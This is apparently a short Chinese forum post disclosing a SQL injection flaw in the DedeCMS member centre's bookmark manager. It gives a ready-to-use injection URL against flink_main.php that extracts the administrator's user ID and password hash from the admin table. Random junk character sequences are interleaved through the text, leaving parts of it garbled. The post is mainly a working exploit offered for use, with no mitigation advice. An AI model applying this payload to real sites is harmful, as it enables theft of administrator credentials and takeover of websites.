DedeCMS会员中心SQL注射漏洞
' @2 D7 y+ h. g! Q% M需要magic_quotes_gpc = Off9 k2 t+ K7 J% w0 B
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.0 I+ K8 p k$ a+ v1 G
7 R# Y2 H& J% n5 D+ i7 f qDedeCMS会员中心书签管理SQL注射漏洞8 i P. X- `5 O9 Q) @
成功利用该漏洞可获得管理员密码4 u( X8 E# j7 X% P2 p" l- [2 r
$ a+ A6 B1 y9 [会员登录后可以执行SQL语句查询数据库任意内容如管理员密码% U/ S x/ e/ ~( `6 C! F
8 ~% b" L% i2 X$ O! x0 `8 \
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
s) T7 T9 f% S" G9 Z( x6 A( \7 P3 [ |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59